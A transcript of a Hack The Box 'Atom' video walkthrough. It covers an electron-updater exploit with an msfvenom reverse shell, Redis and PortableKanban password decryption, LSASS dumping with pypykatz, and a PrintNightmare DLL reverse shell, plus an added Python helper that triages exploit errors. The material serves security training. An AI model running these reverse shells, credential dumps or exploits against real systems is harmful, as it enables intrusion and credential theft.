HackTheBox - Atom
Key Takeaways
The video demonstrates how to exploit vulnerabilities in a Windows system using tools like nmap, rpcdump, and msfvenom, and how to gain system access using reverse shells and credential dumping. The video also covers topics like Electron app decompilation, SMB share exploitation, and password cracking.
Full Transcript
What's going on YouTube, this is IppSec. I'm doing Atom from Hack The Box, which in terms of application reversing is pretty easy: you can decompile the app and find out exactly what's going on, or you can just run it on Windows, tcpdump it, and see the exploit path. That being said, if you have no experience in application reversing this is pretty tough, because you don't know exactly where to start with analyzing an Electron app; there's not a lot of good starting material out there for it. So this is a tough easy box. It starts off with exploiting the auto-updater put into an application, and with that you get a shell on the server. Then the privesc is based around Portable Kanban, which we've seen before in the Sharp video. But after we do the box once, it's also vulnerable to PrintNightmare, so we're going to go in and exploit the box that way after we do it the first way.

So with all that being said, let's jump in. As always we're going to start off with an nmap: -sC for default scripts, -sV to enumerate versions, -oA to output all formats, put it in the nmap directory and call it atom, and then the IP address of 10.10.10.237. This can take some time to run, so I've already run it. Looking at the results we can see there are four ports open. The very first one is HTTP on port 80.

We can see it is running Apache, it's 64-bit Windows, and it has the OpenSSL and PHP modules loaded, so if I do like a dirbust I'm definitely going to specify the PHP extension, because if there are PHP files... uh, yeah. We have 135, which is just MSRPC. Then we have HTTPS, and looking at the certificate its common name is localhost, so it doesn't leak the hostname there. Then we also have 445, and it's telling us it's Windows 10 Pro 19042; not too much information there. We do have a clock skew of, I guess, four minutes maybe, and it's telling us the computer name is Atom. So when I look at HTTPS I'm going to specify the atom hostname just to see if there's a different virtual host, and that's about it. So let's go right now into my /etc/hosts file and we're going to say atom, or 10.10.10.237 is atom.

Before we do anything I'm going to run rpcdump at 10.10.10.237, and all this is going to do is dump a bunch of RPC endpoints. But there was a very recent exploit that came out called PrintNightmare, and I'm just going to search for the Microsoft remote printing endpoint, and if we see it here we're going to try to do PrintNightmare at the end of this video. So we do have it here. In order to exploit this we need a user account, and we don't have any passwords, so it's just kind of a note here, but definitely, because we see this, we should try PrintNightmare.

So let's see, we should open Firefox now and take a look at what's on the web page. Opening up Firefox, go to 10.10.10.237, and we see a web page, Heed Solutions. We have downloads here, an email, and atom.htb, so we have a hostname at the bottom. I'm going to add that in and we're going to keep on going. I'm just looking for other things, other links I mean, and I don't see anything on this; it's not going anywhere. So before we dig into this box let's set up a bunch of recon so we have stuff running while we poke at it. The first thing I want to do is a full port scan, so nmap -p- -oA nmap, and then we'll call it atom-allports, 10.10.10.237.

I'm also going to run gobuster, so gobuster, put it in dir mode, the wordlist is going to be SecLists, Discovery, then Web-Content, raft-small-words, let's see, lowercase. This is a Windows box, so if I look at... I'm guessing this is either index.php or index.html. index.html: Windows is not case sensitive, so if I do capital N, capital D, we get it; on Linux it is case sensitive, so we can't do this. That's why I'm specifying the lowercase wordlist with gobuster, because casing doesn't matter and we can save a lot of requests, which saves time. I'm going to do the PHP extension, and then output, we're going to call this gobuster-root-php.txt. URL not set... is it --url? And we'll do http://10.10.10.237. Let's see, unable to connect... I wonder if we put 10.10.10.237 there. There we go. It's been a while since I ran gobuster, apparently.

So we have that running, we have nmap going, we can take a look at this page. I'm going to try just going to http://atom; it goes to the same thing. We can try atom.htb, same thing. HTTPS, accept the certificate, same thing. So it doesn't look like anything special there. Looking at this download link, we do have a /releases directory; I'm just looking at the bottom left of my screen. So I'm going to try going to atom.htb/releases to see if they have an open index, and they do, but it's only got the zip. I was really hoping that like the coming soon for Mac and Linux would be there and they just didn't link it on the website, but that is not the case. So let's download this Windows one; it's going to download heed setup. So let's cp the heed setup zip from Downloads to the atom directory. And there is one piece of recon we did not run yet, and that is looking at port 445.
So I'm going to do smbclient -N -L 10.10.10.237, and we see there is a Software Updates share. I think this -N is null authentication, so I'm going to take a look at Software Updates. Looking at Software Updates, I just hit enter for a password; we don't have one. There is client1, client2 and client3, so I'm doing a dir against each of those directories; nothing there. Then we also have this UAT testing procedure, so let's download it and we can look at this PDF. I'm going to open up Places, Home, then htb/atom, and look at the PDF. What is Heed? It's a note-taking application built with electron-builder, which helps users take important notes. So this is definitely key to know. We may want to research exactly what electron-builder is, but it's talking about a library, and if a library is vulnerable then the application is vulnerable. It's talking about the update server, and that's about it. So we know what we just downloaded: this heed setup is probably an Electron app built with electron-builder, and it has an auto-update feature.

So I'm looking at this, it is a setup, so I'm going to do file on heed v1 setup.exe: it's a self-extracting archive. I'm sure there's a command-line thing to extract this but I don't know it; thankfully GUIs are smart enough to just automatically do things, so I'm going to double-click on this exe and boom, we have it. I'm going to move the plugins folder into this directory and then I'm going to rename it, because I don't like my folder starting with a dollar sign, so I'm going to call this heed. We go into this and we can see it's got a few DLLs and there's app-64.7z. I'm going to mkdir app and we'll cp this into it. Whenever I extract something I have a habit of always clobbering directories, so that's why I copy it into a directory and then extract. So 7z x to extract, and you can see it put a bunch of files in this directory. If I did it in this heed directory it would just pollute the directory and look bad, so always move stuff into a directory if you want to avoid that. I'm just deleting the 7-Zip there so we can look at all these files.

You don't have to do it this way: if I had a Windows machine handy, which we'll go look at, we'd just open the app and kind of do dynamic analysis. What we're doing here is reversing, or decompiling, this Electron app to get it back into JavaScript and then looking at it that way. So there are two different ways we can do this. Typically I prefer just decompiling the Electron app, because this way we can see if there are any hard-coded secrets in it, like a password; I can more easily see that.

So if we go into resources, we have asar, which is another, like, zipping technology; it's just data. Electron... I don't know what elevate.exe is, it's probably some UAC thing. We've got app-update.yml. If we look at it, it's telling us the application is at updates.atom.htb, so yet another thing to put in our hosts file. So let's do updates.atom.htb, and yeah, it was updates. So let's go to http://updates.atom.htb to see if we get a different page, and we don't, it's still all the same.

Okay, so let's take a look at this asar. If you don't have this tool you can do sudo npm -g install asar to download the extractor, and then asar l on the file so we can see all the files inside of this archive: a bunch of node_modules, and then at the parent we have this main.js. So I'm going to mkdir app and then cp app.asar to app, go here, and we can asar e app to extract... let's see, I guess we can say, yes, extract-file app.asar and let's just get main.js out of there. I'm sure there's probably a way to extract everything with this. man asar, asar -h: list, extract, extract-file, archive. So if I just do asar app then dot... let's see, let's remove main, put our working directory... this doesn't work. We'll just move... extract-file... asar extract, then the archive and destination. So something's not working, clearly. Oh wait, I probably specified f with it. No, okay. I'm not sure; I'll have to look back at the video to see what happened, but there we go, we have now extracted everything out of this asar.

We can look at package.json to see what it is. We do have electron-updater and electron-log. It's an open source application... well, maybe it's not open source anymore, because I don't see a git repository in this. If we look for a .git, no, nothing. So we have a create note HTML file and main.js. First thing I do is remove the archive, and we can take a look at main.js. So it's using electron-updater, it's got a function createNote, it's going to load out of the directory name the createNote template, create, delete, quit, and then app.on. We've got checking for updates, update available, update not available. So any autoUpdater... can we see the code for this? Transport file... I don't see what autoUpdater is doing. Let's see, grep autoUpdater, let's do -i to be case insensitive and -r to recursively search everything, and then we can less it. So let's see, autoUpdater... so it's using electron-updater, I guess.

So if we look... let's go back to Google and look at electron-updater exploit, I think. Let's go to google.com, and we have this signature validation bypass leading to RCE in electron-updater, and it's using electron-builder's fail-open design. It's talking about a lot of things, but this is the YAML file for updates. So I'm going to go up a few directories, and one more... yeah, there are a lot more files in here than I expected, but it's all normal. I'm going to mkdir exploit and I'm going to do latest.yml and make this valid. There we go. So all this exploit is, is if you have a quote within the URL or path it's going to break the signature check and let you execute code. So pairing this information up with the fact there's an SMB share that has software updates, I'm guessing if we place a YAML file that says execute a random executable, it will execute. So let's go and test it out. I'm going to use msfvenom to list payloads so we know what payload we want, because I don't have all these payloads memorized.
I want to choose just a simple reverse shell, so I'm going to do shell_reverse_tcp, that sounds good. So msfvenom -p this, and then we can say LHOST 10.10.14.8 (that needs to be LHOST=), and then LPORT= you guessed it, 9001. It can be anything; I just like choosing that because, well, it's got to be over 9000 in my mind. I'm going to now specify -f for format, exe. I want to say it's -f, we'll find out. And then we'll call it rev.exe. So let this run, we should get an executable, and I'm going to file rev.exe. We see it is a PE32 executable, which is good; that means it's an exe, and it's also 64-bit. I forgot to specify the architecture but it was smart enough to do that for me, so that is good. We have the size of 7168 bytes.

So let's go back over to our YAML file. Let's see, let's move rev.exe into exploit and go into latest... we already have it open up here. Let's see, the size, I'm going to update the size, I don't know if we have to. And then this SHA sum for it looks like it's base64. Typically SHA sums, or any type of sum, are only going to be hex, so seeing like "pe", which is not valid hex (a through f), plus capitals and equal signs, is definitely a big indicator of base64.

So let's do sha512sum on the executable rev.exe. We only want to grab this first piece, so I'm going to awk print $1. Then this is in hex; typically when you see base64s of hashes it's a base64 of the actual data, the hash isn't this, it's actually the hex representation. So if we do xxd -r -p, this is the actual hash. Right now, do wc -c: 64 characters, so 64 bytes I mean, but this is the hash. So now I can base64 it, -w1... -wrap to put it all on one line. All right, I think I said w1, it's w0. -w1 would put like one character per line, which would be hilarious, but yeah, wrap 0 to disable line wrapping. So now we can put our thing here. And the version, I'm going to go over 1.2.3 because I'm guessing if it's running version 4 and we give it version 1 it's probably not going to update, so I'll do 1.3.3.7 and we'll see what happens. Uh, we can do 1.3.3.7, there we go. And then we called it rev.exe, so let's see if this works. Release date, we can update that to be 2021, and we'll do today's date, 07.

There we go. So let's do smbclient //10.10.10.237/... was it Software Updates? Log in, and let's see if we can write to any of these client directories. But first, nc -lvnp 9001. Let's put latest.yml and put rev.exe, and we'll call it rev.exe with that single quote. We do a dir here, and let's just wait for 60 seconds to see what happens. So I'm going to pause the video and we'll see what happens when that sleep finishes. The sleep has not finished, but I do... well, it finished as I was saying that, but I got a reverse shell back. So if I do whoami we can see we are atom\json, or atom\jason; I don't know why my mind just went to JSON, probably because I'm dealing with JavaScript. But the one thing I forgot to do is rlwrap, which is really annoying, so I'm just going to exit this. I'm going to do rlwrap with that reverse shell. We probably have to put the files back, so put rev.exe, uh, put rev.exe rev.exe' and then put latest.yml. Okay, now let's wait for another shell. It's just that rlwrap makes the reverse shell on Windows a bit more manageable; you don't have tab autocomplete, but tab doesn't screw things up.

So if I do dir we can look at that Software Updates directory. We have... if I go into this, I can't, so I don't have permission to do that. My idea was, if I can go into the web directory and write a file, since this is a PHP server, if I just write like shell.php and get a reverse shell or command execution as IIS, then maybe I could do like a potato exploit, because if I do whoami /priv I don't have SeImpersonate, but if I exploited a service on this box I'd most likely have that permission. So since I can't write a shell I'm just going to look at the files. If I go to Desktop we can get the flag. We have links here; I could like play with editing a link to make it malicious, however Jason would click that and we're already Jason, so nothing really there. Look at .config, that sounds interesting. There is a config store, so let's go into this directory; this is an Electron thing.
Let's look in Documents; that's the UAT testing procedure that we already looked at. Let's go to Downloads and we have kanban, so let's go into Downloads/PortableKanban. I forget exactly what this application was, but if you go to ippsec.rocks and search for kanban we can look at it being used in Sharp. So this piece is probably going to go pretty quick because we've done this once before. Looking at dir again, I'm going to pull the config, so I'm just doing type (it's probably Get-ChildItem in PowerShell; I should do that to stay in PowerShell, but I'm lazy). I'm going to copy this because I think this is just a big JSON file, and we're going to look at it with jq on our Linux machine. Copying all of this, come on, there we go. Let's go to Linux. mkdir priv, move... uh, kanban, vi config, how do I insert, there we go. Then cat config | jq . Oh, maybe it's... invalid numeric literal, line 1, 1106. There's some piece of thing that's breaking JSON. Let's see exactly what character that was at; it looks like 1106. So if I go and just type 1106 and then hit the pipe, it brings me to that spot and I can look at what it looks like, and right off the bat this is weird, so maybe this isn't valid JSON. We have a double quote, a name, a bracket, a double quote in double quotes, so this is some different serialization format, so jq is not parsing that. So let's just do the lazy way of cat config and then sed, search for all commas, replace them with line breaks, and we can less this to go and view things.

So we have it doing a Redis server, localhost 6379. I'm going to go back to my recon and we can see when I did all ports we do see WinRM and also Redis. Awesome. So let's go looking at this. We have an encrypted password, and from the Sharp machine, remember, Kanban just stores things with a static secret, so we can just easily decrypt this and then get what the database password is. Because if I use Redis, let's see, redis-cli -h 10.10.10.237. Let's see, help, let's see what I can do with Redis. Let's just try a simple command like ping: we get authentication required. So in order to do anything within Redis we need to authenticate. Thankfully we have the password.

So I just want to go to CyberChef: go to Google, CyberChef, go here. And then the other thing we need is the Kanban static secret so we can decrypt this. To do that, let's go back to Google, search just "kanban decrypt", and it looks like we have an exploit right here. So let's see, we've got the key and the initialization vector. So let's go back to CyberChef. Make sure we have this copied; I think it's copied, paste, no. See if I highlight this way, there we go. I don't know why it wasn't highlighted before, but oh well. So this looks like it's probably base64. I'm going to echo -n, base64 -d; it gives us a bunch of gibberish but we don't see "invalid data", so we know it is indeed base64. If we remove a few characters then we've... like, if I saw this "invalid input" then I may think it's just raw or something, but because I didn't get that I'm going to assume it's base64. Now going back here, it is DES, so I'm going to copy the DES key. I'm going to search for DES decrypt in CyberChef and we're going to paste the key, and we need the initialization vector, and initial... is that? So let's paste this, and then we want to change this to be, let's see, is this base64 maybe? So let's do base64, base64: invalid key, six bytes. So a DES key, maybe that's eight: one two three four five six seven eight. So maybe that's not base64.

Well, maybe, let's just do raw. So let's do this, and unable to decrypt with those parameters; change this to raw and we have it. So the password is kid vs cat yes kid vs cat, but we have the password decrypted. So we can now go and probably use Redis to dump it. So we do the redis-cli and then we can AUTH. So I just do AUTH and we do the password; there was no username in that config, I think. So AUTH, the password, we get OK. If I do ping it says PONG, so now we know we are authenticated. We can do KEYS * to list all the keys in this database, and the one that looks interesting is this right here, the one that says user. So I'm going to GET, I'm going to paste that, and we have the ID, the name's administrator, email is nothing, and we've got the password right here; it is an admin. So I'm going to copy the password, go back to our CyberChef, paste it, and the password is kid vs cat admin at one two three. So I'm going to copy this and we'll do, let's see, psexec.py, is it administrator@10.10.10.237, paste the password. Requesting shares, uploading, and we have a shell. We could also use like wmiexec or evil-winrm; there's a ton of ways we can get access to this. But yeah, the reason why I killed that is I did dir on System32 and it took forever to get output. But if we go to Users\Administrator and then we look at Desktop, we can get root.txt. So that'll be pretty much the box, but I said we'd look into PrintNightmare, so let's do that.

The first step is we have to get a low-privilege user's password. I'm going to try to dump LSASS, so let's do it that way first. Let's see, I want to dump the process with rundll32; I'm looking for like a red team tips page on using rundll32 to dump a process. There we go, Red Team. So it's talking about all the ways we could upload Mimikatz, but that's not fun; we don't want to upload Mimikatz, we want to do this feature. There we go. So let's go and do tasklist because we have to get the LSASS process. Maybe I should have used evil-winrm because it would have been much faster.
Let's see, evil-winrm -u administrator -p, go over here, copy, paste, oh, that's not the password; let's try ctrl-shift-insert, there we go, -i 10.10.10.237. There we go, tasklist, much faster. So we want to look at lsass, and that is running as PID 680. Is that what this example was? 624, close. So MiniDump 680 and we'll do it to Users\Administrator\Documents. See, go, and now we have lsass.dmp. So I think I can just do get lsass.dmp. Let's see, question mark, run evil-winrm commands, no, is it download? There we go, so it is downloading. I typed... what did it actually... is this the file? That's going to be funny if it worked; I'll have no idea how it worked. Okay, it did not, so it is downloading now. What directory was I in when I ran this? Probably where I'm at now, yeah, htb/atom. So we've got to wait for that process to finish.

In order to do this we probably have to use pypykatz. Let's see, python katz, Google, is it pypykatz with a k? There we go. This is a Mimikatz implementation in Python. So cd /opt, git clone. It is really slow at copying files in evil-winrm; it's like copying it one byte at a time or something. It's not that big of a file, but we can get this running. So let's see, python3 -v, what is the syntax to do a virtual environment? It's not -v, it's -m for module, and then venv, and we're going to just create the environment, venv. All this does is make it so we don't clobber ourselves. So we created this virtual environment directory and it loads all the Python things, so when I install this it's going to load it into the venv and not clobber my system. Very important. So let's do source venv/bin/activate and now we see this venv prompt, so we're in it. So now when I do python3 setup.py install it should be installing to this custom environment. Yeah, installing pypykatz to /opt/pypykatz/venv/bin, awesome. I don't know why it's going to htb/cloud; it's doing that with something else and it made for like a bad time. So requirements.txt, find . | grep require, let's see, pip3 install this, is it going to work? Hey, I think it does. See what I'm doing now, ls venv/bin, do we have it, let's see if it works. It looks like it does. So once we get this file we'll be able to use pypykatz to hopefully dump it, so I'm going to pause the video and wait for this to finish.

So it has finished; now I can do pypykatz. We'll do lsa, -h, and we want to either specify minidump or rekall, then the memory file. Let's try rekall and then /home/ippsec/htb/atom/lsass.dmp. No module rekall. Let's do minidump, see, minidump with a p, and we have it extracting things. So let's see if we get a password. Login session, I'm thinking we will because a user probably is logged in interactively in order to open that Atom app to get the code execution. So that's Administrator's NTLM hash, oh, this is looking good, and there we go, we got Jason's password, I think I said JSON again, Jason's password right here: kid vs cat electron at one two three. So what we can do is crackmapexec 10.10.10.237 smb -u jason -p to make sure this is indeed the password. See, I think it's cme 10.10.10.237 like that, no, is... okay, it is. Don't fault it when it works. So now we have Jason's password.

So we want to do the... what is it... let me just save this to a file, so vi creds, jason like that, administrator, do I still have it? If I don't it's not the end of the world because we don't need it any more. I wish I'd saved the Redis password; I bet I could grab it right here off... yeah, it's not worth it. Oh, rlwrap, it's probably this one, AUTH, yeah, it's lost in the ether. But we have the passwords, that's what matters. I just did that in case I forget the password and can't find it. So we have creds; you should always take notes.

I'm going to search for cube0x0 PrintNightmare because this is the Impacket version of this; it's on his repo. So we have the CVE and both the Impacket and the .NET. Not going to worry about the .NET one; we're just going to use Impacket. So cd /opt and I'm going to git clone, and he added a few modules to Impacket, so we also have to download that. Let's see, does he say... yeah, he's saying uninstall Impacket then install his. But we're going to do a virtual environment of Impacket. So let's do python3 -m venv... actually, let's do mkdir printnightmare, mv the CVE directory to printnightmare and then go into it, and then move impacket to this directory. There we go. So now we can do python3 -m venv, virtual environment, cd impacket, then pip3 install the requirements.txt, and then we can do... oh, thankfully it didn't really change too much, but you should never do that, because I did not activate my environment. So source venv/bin/activate, there we go. So now we can install everything and we can run setup.py. You don't have to do that requirements too, or like the pip install requirements; you should just be able to run this install. But copying that box into this screwed something up, and that's how it works for me. Sometimes you don't troubleshoot things; you're like, oh, it works, that's just how life is now. So that's essentially what I did there.

So we should have the Impacket version here, we did the install, so we can go into this directory. And there is one thing right now that I like: this pull request. It updates the exploit to remove a brute force; it's a bit more reliable if we do it this way. I had to do this actually on a pentest I was on yesterday, so I'm going to kind of walk through some of the troubleshooting I did, because there was some type of EDR blocking me from doing the default, like creating a DLL to add a user, so I had to go with a reverse shell. So I'll kind of simplify it, go through my troubleshooting, and yeah. So the only thing this pull changed was this file, so I'm just going to call this update... we'll call it printnightmare.py. It doesn't really matter what we call it, but I just want the updated one. The other difference between this is we specify our driver name. So what this exploit does is it loads a DLL, or installs a printer, which is just a DLL.
is just a dll so you have to call it something you can call it anything you want and i think the default for this is one two three four um let's do them this is it one two three four yeah printer name is one two three four so the updated one puts that as a argument so python 3 print nightmare dot pi we have to specify the target driver name share so let's do python3 the target is going to be jason colon the password so let's cat creds and grab jason's password and then at oh that's going to be weird um it's normally like user colon password at host name but the password has an at so i'm not sure if mpeg is going to be smart enough to only pull the last one but we'll try 10 10 10 to 37. okay the printer name will be please subscribe and then the path of the dol so in most cases you'll probably upload this to a file server in my case i uploaded it to a file share that was on a nas that accepted scans but you can upload it anywhere that the target machine can access over smb chances are it won't be able to access smb over the internet so keep that in mind when you do the exploit but nc lvmp 445 and i don't i'm not like trying to get code execution right now i just want to see if it's going to reach out to me so all i did is give it an smb and we run it and file not found wait what how is it no file not found if maybe i put this in quotes there we go so you want to put that in quotes we get a um smb thing back so we know we actually got something to execute so we have to create a dll we can use msf venom to create the dll but chances are if you just go that route you're gonna have to deal with antivirus which it's not fun so what i'm going to do is create a dll so let's go over to a windows machine and i'm going to go into visual studio and uh i have a reverse shell up already um i did not clean up from when i was working earlier so i guess i'll just show how i got this let's see open up edge and i just googled um c plus reverse shell and that went to a website like 
BankSecurity. Let's see, BankSecurity, and we can code them in anything I like, C++ or .NET. So I went to his C++ one, and if we look at the code, all I did was pretty much copy this code. We can see WSAStartup, MAKEWORD, everything. So we have the reverse shell here; I just copied it into a function, and then again all of these I have up here. And how everyone online does this exploit is, instead of calling RevShell here, they just call system, and then cmd /c net user ipsec PleaseSubscribe /add, and then they call net localgroup administrators ipsec /add, something like that. But this wasn't working for me, not sure exactly why, so I had to go with a reverse shell type route.

And as I was trying this net user and nothing was working, I decided I'd compile that as x86, which is 32-bit, and see what error message it gives me. Because you saw... let's see, let's go into SMB, let's just start the server. Let's see, touch test.dll, and we can do smbserver ipsec pwd. Okay, so if I run this and we do share test.dll, we can see login failure. Oh, I wonder if I can get rid of username/password? Probably not, I haven't actually done it this way. Okay, I think that worked: "specified server can't perform the operation". So that's the error message. If we give it something that does not exist, let's see if it says the file can't be found. Uh, no. So, shoot. Do we have... let's see, I was not using my built-in file server in Impacket when I did this before, so this is going slightly differently than I'm used to. cube0x0's GitHub, let's pull it. Let's see, smb.conf is what I need. Okay, sudo vi /etc... let's see, cd /etc, sudo cp samba/smb.conf to a backup, sudo vi, delete this file, paste the new one. Okay, so map to guest = bad user, share on 445, that's fine, guest ok, okay, read only = no, okay. So I just want /home/ipsec/htb/atom. sudo service smbd restart. There we go. So if we try this again with test.dll, what do we get? It connects, it goes to execute, "network name can't be found", because we call it something else here. Comment, samba... maybe it is samba or smb. There we go, the share name is this. "No such user", let's see, force user. This is getting annoying, let's just force it to be me. Probably not the most secure thing, but I like to live dangerously. Okay.

So by just giving it a blank file, this is actually the same exact error as I get from it being 32-bit: "exe machine type mismatch". So this tells me it's actually loading the DLL. The first step is to give it a file that doesn't exist, and you see "can't find the file specified". So we have three pieces of troubleshooting right now. The very first one is we just did netcat and we saw the server connected to us, so we know it makes a connection. The second piece is we go on a file share and give it something that does not exist, and it tells us the file does not exist. So now we know, number one, it connects and it downloads a file. Then we give it a file that it can't load, so in my case it was 32-bit, but if you just create a blank file you get this exe type mismatch, so you know it's actually doing something with that DLL. So now the third piece of this, since that's not the right machine type, is to give it a reverse shell. So let's compile this for 64-bit: Build, Rebuild Solution, and hopefully this works. Okay, so I can just copy this, and then we just gotta copy this DLL to a box. So let's go, I'm gonna do 168 230 smb, and we'll copy this, and we just called it dll1.dll. And we should do a nc -lvnp... what port was I doing it on? I think I was doing it on 80. Let's see, so 10.10.14.8, here's the port, 80. We have to sudo because that's a privileged port. And now we run this and boom, we are now SYSTEM on the box.

So that's doing the box through PrintNightmare, and this is probably, like, how I did the troubleshooting: based upon it connecting, it checking the correct file, the version mismatch between 32 and 64-bit. Those are all critical troubleshooting things. You just break it into smaller pieces. That helps you greatly when you try to break into this field, or if you're trying the OSEP: if you try an exploit and it doesn't work, don't keep doing a bunch of tweaks to it. Try to simplify the exploit and then find out exactly, like, yes, it's making it this far, okay, it's making it this far, it's making it this far, okay, now I can do the final leap. In my case my net user command wasn't working, I'm not sure if it's EDR, cmd.exe was blocked, etc. So I was just like, okay, how far is this going? And I couldn't do the connect back to me because again it was going through a firewall, but I could say okay, well, it's definitely checking the file share because I'm getting this "file does not exist", and when I give it a 32-bit file it gives me a different error, so I know it's doing something with the DLL. So knowing that, let me try changing the DLL up, because obviously that piece isn't working. So hope you enjoyed the video, take care, and I will see you all next week.
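The three-stage troubleshooting in the video (does the spooler connect, does it fetch the file, does it load the DLL) maps onto the error codes the exploit prints, and the 32-bit versus 64-bit mistake is checkable before a single packet goes out. The following is an added example, not code from the video or from cube0x0's exploit: a pre-flight check of the DLL's PE header plus a classifier for the `RPRN SessionError` lines Impacket-based PrintNightmare exploits print. The error-code-to-stage mapping, the sample output lines and the `make_pe_stub` helper are this example's own assumptions; the numeric codes are standard Windows system error codes and the PE header offsets are from the PE format.

```python
"""Added example (not from the video): pre-flight and triage helpers for the
PrintNightmare DLL-loading path.

  1. check_payload(): is the DLL we are about to serve a 64-bit PE DLL?  The
     "exe machine type mismatch" seen in the video is what a 32-bit build
     produces on a 64-bit spooler.
  2. triage(): map one "RPRN SessionError" line from the exploit output to the
     troubleshooting stage it proves was reached (share / fetch / load).
The stage mapping and the sample lines are constructed for this example.
"""
import re
import struct

IMAGE_FILE_MACHINE_I386 = 0x014C
IMAGE_FILE_MACHINE_AMD64 = 0x8664
IMAGE_FILE_DLL = 0x2000
_ARCH = {IMAGE_FILE_MACHINE_I386: "x86", IMAGE_FILE_MACHINE_AMD64: "x64"}


def check_payload(data: bytes, want: str = "x64") -> dict:
    """Parse the DOS/PE headers of `data` and report whether it is a DLL built
    for the target architecture (x64 for Atom, per the nmap output)."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return {"ok": False, "arch": None, "is_dll": False,
                "reason": "not a PE file (no MZ header); the spooler cannot load it"}
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if e_lfanew + 24 > len(data) or data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        return {"ok": False, "arch": None, "is_dll": False, "reason": "bad PE signature"}
    # IMAGE_FILE_HEADER follows the 4-byte signature: Machine, NumberOfSections,
    # TimeDateStamp, PointerToSymbolTable, NumberOfSymbols, SizeOfOptionalHeader,
    # Characteristics
    machine, _, _, _, _, _, chars = struct.unpack_from("<HHIIIHH", data, e_lfanew + 4)
    arch = _ARCH.get(machine, f"unknown(0x{machine:04x})")
    is_dll = bool(chars & IMAGE_FILE_DLL)
    reason = "ok"
    if arch != want:
        reason = f"built for {arch}, target spooler is {want}: expect ERROR_EXE_MACHINE_TYPE_MISMATCH"
    elif not is_dll:
        reason = "PE is an EXE, not a DLL (IMAGE_FILE_DLL not set)"
    return {"ok": reason == "ok", "arch": arch, "is_dll": is_dll, "reason": reason}


def make_pe_stub(machine: int, characteristics: int = 0x2002) -> bytes:
    """Constructed helper: a minimal (non-loadable) MZ/PE header carrying only
    the Machine and Characteristics fields, for exercising check_payload()."""
    dos = b"MZ" + b"\0" * 58 + struct.pack("<I", 0x40)  # e_lfanew (at 0x3C) -> 0x40
    file_header = struct.pack("<HHIIIHH", machine, 1, 0, 0, 0, 0, characteristics)
    return dos + b"PE\0\0" + file_header


# Windows system error codes as they appear in Impacket's RPRN SessionError,
# keyed to the exploit stage that error proves was reached (assumed mapping).
_STAGES = {
    0x52E: ("share", "ERROR_LOGON_FAILURE: host reached, spooler could not authenticate; allow guest access"),
    0x3A: ("share", "ERROR_BAD_NET_RESP: SMB server answered but refused the operation; check its config"),
    0x43: ("share", "ERROR_BAD_NET_NAME: the share name in the UNC path does not exist"),
    0x2: ("fetch", "ERROR_FILE_NOT_FOUND: share reachable, the DLL path inside it is wrong"),
    0xC1: ("load", "ERROR_BAD_EXE_FORMAT: DLL downloaded but is not a valid PE image"),
    0xD8: ("load", "ERROR_EXE_MACHINE_TYPE_MISMATCH: DLL downloaded and loaded, wrong architecture"),
    0x5: ("rpc", "ERROR_ACCESS_DENIED: the RPC call itself was refused before any file was fetched"),
}
_RPRN_RE = re.compile(r"SessionError: code: 0x([0-9a-fA-F]+) - (\w+)")


def triage(line: str) -> tuple:
    """Return (stage, hint) for one line of exploit output."""
    m = _RPRN_RE.search(line)
    if not m:
        return ("unknown", "no RPRN error in this line")
    code = int(m.group(1), 16)
    if code in _STAGES:
        return _STAGES[code]
    return ("unknown", f"unmapped error 0x{code:x} ({m.group(2)})")


# Constructed sample lines in the format Impacket's RPRN SessionError prints.
SAMPLE_OUTPUT = [
    "RPRN SessionError: code: 0x43 - ERROR_BAD_NET_NAME - The network name cannot be found.",
    "RPRN SessionError: code: 0x2 - ERROR_FILE_NOT_FOUND - The system cannot find the file specified.",
    "RPRN SessionError: code: 0xd8 - ERROR_EXE_MACHINE_TYPE_MISMATCH - This version of %1 is not compatible with the version of Windows you're running.",
]

if __name__ == "__main__":
    for name, blob in [("empty", b""),
                       ("x86", make_pe_stub(IMAGE_FILE_MACHINE_I386)),
                       ("x64", make_pe_stub(IMAGE_FILE_MACHINE_AMD64))]:
        print(name, check_payload(blob))
    for line in SAMPLE_OUTPUT:
        print(triage(line))
```

Run `check_payload()` on the built DLL before copying it to the share; run `triage()` on the exploit's error line after each attempt. A `share` result means the Samba side (share name, guest access, `force user`) still needs work; `fetch` means the share is fine and only the path is wrong; `load` means the spooler actually pulled and tried to load the file, so from there on the DLL itself is the only moving part.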
Original Description
00:00 - Intro
00:50 - Start of nmap
02:15 - Running RPCDump which shows if this is vulnerable to PrintNightmare (Exploit it later)
03:00 - Examining the webpage
04:15 - Explaining why I use lowercase wordlists against Windows webservers
06:00 - Listing shares with smbclient to find an open share
07:30 - Decompiling the Electron installer/app with asar
12:00 - Everything is extracted looking at package.json and main.js to find electron-updater
14:10 - Searching for exploits within Electron
15:30 - Using MSFVENOM to build a reverse shell
16:45 - Editing our installer YAML to point to our reverse shell
19:30 - Putting the files on the share and getting our reverse shell
21:30 - Exploring the box to find PortableKanban
22:30 - Copying the config to our box so we can extract the database password
25:40 - Using CyberChef to decrypt the Portable Kanban password
28:20 - Authenticating to Redis with redis-cli and dumping the user information to get the administrator password
30:30 - Using rundll32 to create a memory dump of LSASS so we can extract a password
32:30 - Downloading lsass.dmp with evil-winrm
35:30 - Using Pypykatz to parse the dump file and get Jason's password
38:30 - Building our environment to perform CVE-2021-1675 (PrintNightmare)
42:50 - Using PrintNightmare to connect to our netcat to verify it is vulnerable
44:20 - Building a DLL to send a reverse shell
46:50 - Having trouble with Impacket's SMBServer, configuring our local SMBD to work with this exploit
49:20 - Reading more errors from impacket to verify we do have code execution
50:10 - Giving a file that doesn't exist to see another error... More verifying that this is working
51:20 - Giving it our ReverseShell DLL to get a reverse shell